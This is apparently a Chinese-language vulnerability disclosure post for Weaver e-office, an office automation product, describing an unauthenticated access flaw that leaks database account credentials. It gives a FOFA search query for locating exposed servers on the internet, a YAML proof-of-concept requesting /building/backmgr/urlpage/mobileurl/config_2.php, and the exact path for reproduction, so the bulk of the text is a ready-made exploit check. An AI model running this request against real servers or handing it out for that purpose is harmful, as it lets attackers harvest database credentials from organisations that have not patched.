漏洞简介
泛微e-office是一种企业办公自动化软件解决方案,由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office存在未授权访问,攻击者可以访问页面获取敏感信息,可获取数据库账户密码。
fofa 搜索语法
(body=“login.php”&&body=“eoffice”)||body=“/general/login/index.php”
yaml poc
detail:
ID: 5285
Author: 匿名作者
Name: 泛微e-office 未授权访问
Description: 泛微e-office是一种企业办公自动化软件解决方案,由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office
存在未授权访问,攻击者可以访问页面获取敏感信息。
Identifier:
DVB: DVB-2023-5285
VulnClass:
- 认证绕过/未认证
Category:
- 应用服务
Manufacturer: 泛微
Product: e-office
Type: 1
Status: 1
Scanable: 1
Level: 2
DisclosureDate: '2023-10-18'
Is0day: false
IncludeExp: false
Weakable: false
IsXc: false
IsCommon: false
IsCallBack: false
Condition: (body="login.php"&&body="eoffice")||body="/general/login/index.php"
Solutions:
- 请关注厂商的修复版本,并及时更新到最新版本.
poc:
relative: req0
session: false
requests:
- method: GET
timeout: 10
path: /building/backmgr/urlpage/mobileurl/config_2.php
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/83.0.2597.132 Safari/537.36
follow_redirects: true
matches: (code.eq("200") && body.contains("数据库名") && body.contains("用户名"))
漏洞复现
漏洞路径:/building/backmgr/urlpage/mobileurl/config_2.php
更多poc更新
https://github.com/wy876/POC